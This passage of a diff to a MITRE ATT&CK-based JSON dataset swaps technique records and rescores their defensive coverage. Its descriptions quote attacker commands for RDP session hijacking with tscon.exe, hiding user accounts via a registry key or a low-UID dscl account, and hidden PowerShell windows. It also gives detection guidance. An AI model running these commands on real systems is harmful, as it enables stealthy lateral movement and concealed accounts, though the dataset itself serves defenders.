+                "detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1563.002",
+                "name": "Remote Service Session Hijacking: RDP Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1563/002",
+                "description": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)",
+                "detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1035",
+                        "name": "Limit Access to Resource Over Network",
+                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1035"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            }
+        ],
         "mitigations": [
             {
-                "mid": "M1053",
-                "name": "Data Backup",
-                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                "url": "https://attack.mitre.org/mitigations/M1053"
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.6232270714285715,
-        "adjusted_score": 0.6232270714285715,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "cumulative_score": 0.4525924823809524,
+        "adjusted_score": 0.4525924823809524,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.12",
             "4.1",
-            "11.1",
-            "11.2",
-            "11.3",
-            "11.4",
-            "11.5",
+            "4.2",
+            "4.4",
+            "4.7",
+            "4.8",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.6",
+            "12.2",
+            "12.8",
             "18.3",
-            "18.5"
+            "18.5",
+            "16.10"
         ],
         "nist_controls": [
+            "AC-17",
+            "AC-2",
             "AC-3",
+            "AC-4",
+            "AC-5",
             "AC-6",
+            "CA-8",
             "CM-2",
+            "CM-5",
             "CM-6",
             "CM-7",
-            "CP-10",
-            "CP-2",
-            "CP-7",
-            "CP-9",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "IA-6",
+            "RA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4"
         ],
         "process_coverage": true,
-        "network_coverage": false,
+        "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.37142857142857144,
-            "mitigation_score": 0.36363636363636365,
-            "detection_score": 0.38
+            "combined_score": 0.3523809523809524,
+            "mitigation_score": 0.6727272727272727
         },
-        "choke_point_score": 0.2,
-        "prevalence_score": 0.0517985
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00021153
     },
     {
-        "tid": "T1491",
-        "name": "Defacement",
-        "description": "Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n",
-        "url": "https://attack.mitre.org/techniques/T1491",
+        "tid": "T1563.001",
+        "name": "Remote Service Session Hijacking: SSH Hijacking",
+        "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
+        "url": "https://attack.mitre.org/techniques/T1563/001",
         "tactics": [
-            "Impact"
+            "Lateral Movement"
         ],
-        "detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n",
+        "detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.",
         "platforms": [
-            "IaaS",
             "Linux",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "File: File Creation",
-            "File: File Modification",
-            "Network Traffic: Network Traffic Content"
+            "Command: Command Execution",
+            "Logon Session: Logon Session Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1563",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1491.001",
-                "name": "Defacement: Internal Defacement",
-                "url": "https://attack.mitre.org/techniques/T1491/001",
-                "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)",
-                "detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
-                "mitigations": [
-                    {
-                        "mid": "M1053",
-                        "name": "Data Backup",
-                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                        "url": "https://attack.mitre.org/mitigations/M1053"
-                    }
-                ]
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             },
             {
-                "tid": "T1491.002",
-                "name": "Defacement: External Defacement",
-                "url": "https://attack.mitre.org/techniques/T1491/002",
-                "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)",
-                "detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
-                "mitigations": [
-                    {
-                        "mid": "M1053",
-                        "name": "Data Backup",
-                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                        "url": "https://attack.mitre.org/mitigations/M1053"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
             {
-                "mid": "M1053",
-                "name": "Data Backup",
-                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                "url": "https://attack.mitre.org/mitigations/M1053"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 0.20238095238095238,
-        "adjusted_score": 0.20238095238095238,
+        "cumulative_score": 0.40476190476190477,
+        "adjusted_score": 0.40476190476190477,
         "has_car": false,
-        "has_sigma": false,
+        "has_sigma": true,
         "has_es_siem": false,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "11.1",
-            "11.2",
-            "11.3",
-            "11.4",
-            "11.5"
+            "2.3",
+            "2.5",
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.2",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.7",
+            "18.3",
+            "18.5",
+            "16.10"
         ],
         "nist_controls": [
+            "AC-17",
+            "AC-2",
             "AC-3",
+            "AC-5",
             "AC-6",
+            "CA-7",
             "CM-2",
-            "CP-10",
-            "CP-2",
-            "CP-7",
-            "CP-9",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-5",
+            "RA-5",
+            "SC-12",
+            "SC-23",
+            "SI-4"
         ],
-        "process_coverage": false,
+        "process_coverage": true,
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.15238095238095237,
-            "mitigation_score": 0.2727272727272727,
-            "detection_score": 0.02
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1495",
-        "name": "Firmware Corruption",
-        "description": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.",
-        "url": "https://attack.mitre.org/techniques/T1495",
+        "tid": "T1563.002",
+        "name": "Remote Service Session Hijacking: RDP Hijacking",
+        "description": "Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)",
+        "url": "https://attack.mitre.org/techniques/T1563/002",
         "tactics": [
-            "Impact"
+            "Lateral Movement"
         ],
-        "detection": "System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.",
+        "detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Firmware: Firmware Modification"
+            "Command: Command Execution",
+            "Logon Session: Logon Session Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1563",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1046",
-                "name": "Boot Integrity",
-                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                "url": "https://attack.mitre.org/mitigations/M1046"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             },
             {
                 "mid": "M1026",
@@ -11369,557 +34087,511 @@
                 "url": "https://attack.mitre.org/mitigations/M1026"
             },
             {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.3119047619047619,
-        "adjusted_score": 0.3119047619047619,
+        "cumulative_score": 0.5571428571428572,
+        "adjusted_score": 0.5571428571428572,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": false,
+        "has_es_siem": true,
+        "has_splunk": true,
         "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.12",
             "4.1",
+            "4.2",
+            "4.4",
             "4.7",
+            "4.8",
+            "5.1",
             "5.3",
-            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
             "6.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.5",
+            "7.6",
+            "12.2",
+            "12.7",
+            "12.8",
+            "13.5",
             "18.3",
-            "18.5"
+            "18.5",
+            "13.10",
+            "16.10"
         ],
         "nist_controls": [
+            "AC-11",
+            "AC-12",
+            "AC-17",
             "AC-2",
             "AC-3",
+            "AC-4",
             "AC-5",
             "AC-6",
-            "CA-8",
-            "CM-3",
+            "CM-2",
             "CM-5",
             "CM-6",
+            "CM-7",
             "CM-8",
             "IA-2",
-            "IA-7",
-            "RA-9",
-            "SA-10",
-            "SA-11",
-            "SI-2",
-            "SI-7"
+            "RA-5",
+            "SC-46",
+            "SC-7",
+            "SI-4"
         ],
-        "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": false,
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.2619047619047619,
-            "mitigation_score": 0.4909090909090909,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1496",
-        "name": "Resource Hijacking",
-        "description": "Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)",
-        "url": "https://attack.mitre.org/techniques/T1496",
+        "tid": "T1564",
+        "name": "Hide Artifacts",
+        "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)",
+        "url": "https://attack.mitre.org/techniques/T1564",
         "tactics": [
-            "Impact"
+            "Defense Evasion"
         ],
-        "detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.",
+        "detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.",
         "platforms": [
-            "Containers",
-            "IaaS",
             "Linux",
+            "Office 365",
             "Windows",
             "macOS"
         ],
         "data_sources": [
+            "Application Log: Application Log Content",
             "Command: Command Execution",
             "File: File Creation",
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Flow",
+            "File: File Metadata",
+            "File: File Modification",
+            "Firmware: Firmware Modification",
+            "Process: OS API Execution",
             "Process: Process Creation",
-            "Sensor Health: Host Status"
+            "Script: Script Execution",
+            "Service: Service Creation",
+            "User Account: User Account Creation",
+            "User Account: User Account Metadata",
+            "Windows Registry: Windows Registry Key Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1564.001",
+                "name": "Hide Artifacts: Hidden Files and Directories",
+                "url": "https://attack.mitre.org/techniques/T1564/001",
+                "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
+                "detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1564.002",
+                "name": "Hide Artifacts: Hidden Users",
+                "url": "https://attack.mitre.org/techniques/T1564/002",
+                "description": "Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.\n\nIn macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\n\nIn Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)",
+                "detection": "This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \"hidden\" users may still get a home directory and will appear in the authentication logs.\n\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList key.",
+                "mitigations": [
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    }
+                ]
+            },
+            {
+                "tid": "T1564.003",
+                "name": "Hide Artifacts: Hidden Window",
+                "url": "https://attack.mitre.org/techniques/T1564/003",
+                "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)",
+                "detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1564.004",
+                "name": "Hide Artifacts: NTFS File Attributes",
+                "url": "https://attack.mitre.org/techniques/T1564/004",
+                "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)",
